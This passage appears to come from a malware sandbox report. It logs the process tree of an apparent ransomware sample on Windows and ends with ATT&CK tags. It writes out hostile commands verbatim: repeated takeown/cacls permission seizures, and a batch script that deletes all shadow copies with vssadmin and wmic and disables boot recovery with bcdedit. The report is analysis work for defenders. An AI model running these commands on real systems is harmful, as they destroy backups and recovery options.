C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "wabmig.exe" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "wabmig.exe" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "watermark.png" -nobanner3⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "watermark.png" -nobanner4⤵PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "superbar.png" -nobanner3⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "superbar.png" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "overlay.png" -nobanner3⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "overlay.png" -nobanner4⤵PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:1196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "background.png" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "background.png" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:1600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "background.png" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "background.png" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:1440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "device.png" -nobanner3⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "device.png" -nobanner4⤵PID:612
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1040
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FE140CA3-7C7D-4DAF-BC91-B22B5BBEBF51} S-1-5-21-2090973689-680783404-4292415065-1000:UCQFZDUI\Admin:Interactive:[1]1⤵PID:1836
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\4HhkjbNs.bat"2⤵PID:1580
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1440
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1944
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:268
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1132
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1724
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3